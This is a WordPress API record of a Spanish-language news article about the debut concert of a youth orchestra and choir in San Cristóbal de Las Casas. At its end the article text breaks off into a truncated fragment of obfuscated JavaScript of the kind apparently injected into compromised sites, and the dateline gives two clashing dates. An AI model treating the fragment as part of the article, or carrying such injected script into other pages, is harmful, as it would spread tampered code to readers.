{"id":19080,"date":"2024-11-30T05:26:33","date_gmt":"2024-11-30T05:26:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19080"},"modified":"2024-11-30T05:26:34","modified_gmt":"2024-11-30T05:26:34","slug":"mas-de-200-ninas-ninos-y-jovenes-brillaron-en-su-debut-de-la-orquesta-y-coro-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19080","title":{"rendered":"M\u00e1s de 200 ni\u00f1as, ni\u00f1os y j\u00f3venes brillaron en su debut de la \u201cOrquesta y Coro San Crist\u00f3bal\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-1024x682.jpg\" alt=\"\" class=\"wp-image-19081\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0036.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>29 de octubre del 2024. San Crist\u00f3bal de Las Casas, 29 de noviembre de 2024.- La noche del jueves, el Teatro de la Ciudad Hermanos Dom\u00ednguez se visti\u00f3 de gala para recibir la primera presentaci\u00f3n de la \u201cOrquesta y Coro San Crist\u00f3bal\u201d, un evento que marc\u00f3 un hito en la Cultura de San Crist\u00f3bal de Las Casas. Con m\u00e1s de 200 ni\u00f1as, ni\u00f1os y j\u00f3venes en el escenario, el p\u00fablico pudo disfrutar de una muestra impresionante de talento, disciplina y dedicaci\u00f3n, el resultado de meses de preparaci\u00f3n ardua por parte de los integrantes de esta agrupaci\u00f3n musical.<\/p>\n\n\n\n<p>Ricardo I. Obert Mart\u00ednez, Director General del Sistema Nacional de Coros y Orquestas Esperanza Azteca, fue el encargado de abrir la velada con unas palabras de agradecimiento y reflexi\u00f3n, destacando la importancia de esta iniciativa, que se lleva a cabo en colaboraci\u00f3n con el Ayuntamiento de San Crist\u00f3bal de Las Casas, el Grupo Impulsar y la Fundaci\u00f3n Azteca; &#8220;Hoy estamos aqu\u00ed para celebrar el debut de esta orquesta y coro, despu\u00e9s de un a\u00f1o de trabajo. Estos ni\u00f1os, ni\u00f1as y j\u00f3venes han trabajado incansablemente durante meses, con sesiones de hasta cuatro horas diarias, y hoy podemos ver el fruto de su esfuerzo. Para ellos, este es un sue\u00f1o hecho realidad&#8221;.<\/p>\n\n\n\n<p>Resalt\u00f3 que este proyecto no solo busca ense\u00f1ar m\u00fasica, sino tambi\u00e9n inculcar valores fundamentales en los j\u00f3venes, tales como la disciplina, la honestidad, el trabajo en equipo y la tolerancia. \u201cCuando los j\u00f3venes aprenden a tocar un instrumento o cantar, su cerebro se conecta de manera diferente. La m\u00fasica no solo los hace m\u00e1s inteligentes, sino que tambi\u00e9n les ayuda a desarrollar su autoestima y a vivir los valores de manera pr\u00e1ctica\u201d.<\/p>\n\n\n\n<p>El evento fue una verdadera fiesta para los sentidos, donde se interpretaron diversas piezas musicales que cautivaron a los asistentes. Los j\u00f3venes artistas, vestidos con sus mejores galas, mostraron en todo momento la gran dedicaci\u00f3n y amor por la m\u00fasica que los caracteriza. El p\u00fablico no solo disfrut\u00f3 de la calidad t\u00e9cnica y expresiva de las piezas, sino tambi\u00e9n del esp\u00edritu de unidad y esfuerzo que se reflejaba en cada nota.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 29 de octubre del 2024. San Crist\u00f3bal de Las Casas, 29 de noviembre de 2024.- La noche del jueves, el Teatro de la Ciudad Hermanos Dom\u00ednguez se visti\u00f3 de gala para recibir la primera presentaci\u00f3n de la \u201cOrquesta y Coro San Crist\u00f3bal\u201d, un evento que marc\u00f3 un hito en la Cultura de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19080","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19080"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19080\/revisions"}],"predecessor-version":[{"id":19082,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19080\/revisions\/19082"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19081"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}